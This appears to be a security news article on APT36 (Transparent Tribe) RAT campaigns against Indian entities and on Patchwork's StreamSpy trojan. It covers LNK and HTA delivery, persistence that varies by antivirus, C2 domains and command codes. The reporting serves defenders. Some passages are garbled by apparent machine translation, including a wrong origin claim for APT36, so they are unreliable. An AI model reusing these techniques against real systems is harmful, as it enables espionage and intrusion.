The threat actor known as Transparent Tribe has been attributed to a new set of attacks targeting Indian government, academic and strategic entities with a Remote Access Trojan (RAT), giving them persistent control over compromised hosts.
“The campaign employs deceptive delivery techniques, including a weaponized Windows Shortcut (LNK) file disguised as a legitimate PDF document and embedded with the full PDF content to avoid user suspicion,” CYFIRMA said in a technical report.
Transparent Tribe, also known as APT36, is a hacking group known for its growing cyber espionage campaigns against Indian organizations. Estimated to be of Indian origin, the state-sponsored opposition has been active since at least 2013.
Threat actors boast an ever-evolving arsenal of RATs to achieve their goals. Some trojans used by Transparent Tribe in recent years include CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT.
The latest set of attacks began with a spear-phishing email containing a ZIP archive containing an LNK file disguised as a PDF. Opening the file triggers the execution of a remote HTML application (HTA) script using “mshta.exe” which decrypts and loads the final RAT payload directly into memory. Additionally, the HTA downloads and opens a decoy PDF document so as not to arouse users’ suspicions.
“Once the decoding logic is established, HTA leverages ActiveX objects, specifically WScript.Shell, to interact with the Windows environment,” CYFIRMA said. “This behavior exhibits environment profiling and runtime manipulation, ensuring compatibility with the target system and enhancing execution reliability techniques commonly seen in malware that abuses ‘mshta.exe’.”
A notable aspect of the malware is its ability to adapt its persistence method depending on the antivirus solutions installed on the infected machine –
- If Kaspersky is detected, it creates a working directory under “C:\Users\Public\core\”, writes an obfuscated HTA payload to disk, and installs persistence by dropping an LNK file in the Windows Startup folder, which, in turn, launches the HTA script using “mshta.exe”.
- If Quick Heal is detected, it establishes persistence by creating a batch file and a malicious LNK file in the Windows Startup folder, writing the HTA payload to disk, and then calling it using a batch script.
- If Avast, AVG, or Avira is detected, it works by directly copying the payload to the startup directory and executing it.
- If no recognized antivirus solution is found, it falls back to a combination of batch file execution, registry based persistence, and payload deployment before launching the batch script.
The second HTA file contains a DLL named “iinneldc.dll” that acts as a fully featured RAT, supporting remote system control, file management, data exfiltration, screenshot capture, clipboard manipulation, and process control.
“APT36 (Transparent Tribe) remains a highly persistent and strategically driven cyber-espionage threat with a sustained focus on intelligence collection targeting Indian government entities, academic institutions and other strategically relevant sectors,” the cyber security company said.
In recent weeks, APT36 has also been linked to another campaign that leverages a malicious shortcut file disguised as a government advisory PDF (“NCERT-Whatsapp-Advisory.pdf.lnk”) to deliver a .NET-based loader, which drops additional executables and malicious DLLs to establish remote command execution, system reconnaissance, and long-term access.
The shortcut is designed to execute an obfuscated command using cmd.exe to retrieve the MSI installer (“nikmights.msi”) from a remote server (“aeroclubofindia.co”).[.]in”), which is responsible for initiating a series of actions –
- Extract and display a decoy PDF document to the victim
- Decode and write the DLL files to “C:\ProgramData\PcDirvs\pdf.dll” and “C:\ProgramData\PcDirvs\wininet.dll”
- Leave “PcDirvs.exe” in the same location and execute it after a delay of 10 seconds
- Install persistence by creating “PcDirvs.hta” that contains the Visual Basic script to make registry modifications to launch “PcDirvs.exe” every time after system startup.
It is worth pointing out that the displayed lure PDF is a legitimate advisory issued by the Pakistan National Cyber Emergency Response Team (PKCERT) in 2024 regarding a fraudulent WhatsApp message campaign targeting government entities in Pakistan with a malicious WinRAR file that infects systems with malware.
The DLL “wininet.dll” connects to the hard-coded command-and-control (C2) infrastructure hosted on dns.wmiprovider[.]com. It was registered in mid-April 2025. The activity associated with C2 is currently inactive, but Windows registry-based persistence ensures that the threat can be revived at any time in the future.
“The DLL implements multiple HTTP GET-based endpoints to communicate with the C2 server to establish, update, and retrieve commands issued by the attacker,” CYFIRMA said. “To avoid static string detection, endpoint characters are intentionally stored in reverse order.”
The list of endpoints is as follows –
- /retsiger (register), to register the infected system with the C2 server
- /taebtraeh (heartbeat), to indicate your presence on the C2 server
- /dnammoc_teg (get_command), to run arbitrary commands via “cmd.exe”
- /dnammocmvitna (antivmcommand), to query or set anti-VM state and potentially adjust behavior
The DLL also calls into question the antivirus products installed on the victim system, turning it into a powerful tool capable of performing reconnaissance and gathering sensitive information.
Patchwork linked to new StreamSpy trojan
The revelation comes weeks after Patchwork (aka Dropping Elephant or Maha Grass), a hacking group believed to be of Indian origin, was linked to attacks targeting Pakistan’s defense sector with a Python-based backdoor that is distributed through phishing emails containing zip files, according to security researcher Idan Tarab.
Contained within the archive is an MSBuild project, which when executed via “msbuild.exe” ultimately deploys a dropper to install and launch the Python RAT. The malware is equipped to contact the C2 server and run remote Python modules, execute commands, and upload/download files.
“This campaign represents a modern, highly obfuscated patchwork APT toolkit that includes the MSBuild LOLBin loader, PyInstaller-modified Python runtime, marshalled bytecode implosion, geofencing, random PHP C2 endpoints. [and] Realistic persistence mechanisms,” Tarab said.
As of December 2025, the patchwork has also been combined with a previously undocumented Trojan named StreamSpy, which uses WebSockets and HTTP protocols for C2 communications. While the WebSocket channel is used to receive instructions and transmit execution results, HTTP is used for file transfer.
StreamSpy’s link to Patchwork, according to QiAnXin, stems from its similarity to Spyder, a variant of another backdoor named Warhawk, which is attributed to Sidewinder. Spider use in patchwork begins in 2023.
Delivered via zip archives (“OPS-VII-SIR.zip”) hosted on “FirebaseCloudMail”[.]com,” malware (“Annexure.exe”) can collect system information, establish persistence via LNK file in Windows registry, scheduled tasks or startup folders, communicate with C2 servers using HTTP and WebSocket. The list of support commands is below –
- F1A5C3, To download a file and open it using ShellExecuteExW
- B8C1D2, to set the shell to cmd for command execution
- E4F5A6, To set the shell for command execution on Powershell
- FL_SH1, to close all shells
- To download encrypted zip files from C9E3D4, E7F8A9, H1K4R8, C0V3RT, C2 servers, extract them and open them using ShellExecuteExW
- F2B3C4, to gather information about the file system and all disks connected to the device
- D5E6F7, to upload and download file
- A8B9C0, to upload file
- D1E2F3, to delete a file
- A4B5C6, to rename a file
- D7E8F9, to count a specific folder
QinAnXin said the StreamSpy download site also hosts spider variants with extensive data collection features, with the malware’s digital signature demonstrating a correlation with a different Windows RAT called ShadowAgent attributed to the DoNot team (aka Brainworm). Interestingly, 360 Threat Intelligence Center flagged the executable “Annexure.exe” as ShadowAgent in November 2025.
“The emergence of the StreamSpy Trojan and Spider variants from the Maha Grass group indicates that the group is constantly retooling its arsenal of attack tools,” the Chinese security vendor said.
“In the StreamSpy Trojan, attackers attempt to use WebSocket channels for command issuance and result feedback to trace HTTP traffic and evade censorship. Additionally, correlated samples confirm that the Maha Gras and Donot attack groups have some connections in terms of resource sharing.”
